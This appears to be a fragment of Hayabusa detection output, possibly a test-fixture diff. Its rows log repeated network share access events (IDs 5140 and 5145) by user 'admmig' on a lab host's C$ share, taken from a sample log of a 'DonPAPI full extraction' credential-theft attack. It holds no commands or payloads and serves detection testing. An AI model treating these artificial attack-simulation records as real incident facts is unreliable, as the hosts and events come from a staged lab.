+2021-12-12 16:16:05.234 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.234 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.234 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.234 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.234 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.234 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.249 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.249 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.249 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.249 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.249 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.265 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.268 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.270 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.271 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.271 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.271 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.271 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.271 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.271 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.271 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.286 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.286 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.286 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.286 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.286 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.286 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.286 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.305 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.306 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\baretail - Shortcut.lnk | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.308 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.308 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.323 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.323 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.323 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.323 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.339 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.339 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.339 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\night.bat | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.339 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.339 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.339 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.354 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.354 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.354 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.354 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.370 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.371 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.372 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.372 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.372 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.372 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.372 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.372 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.388 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.388 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.388 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.388 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.388 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.388 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.388 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.388 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.407 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.408 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.408 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.408 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.408 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
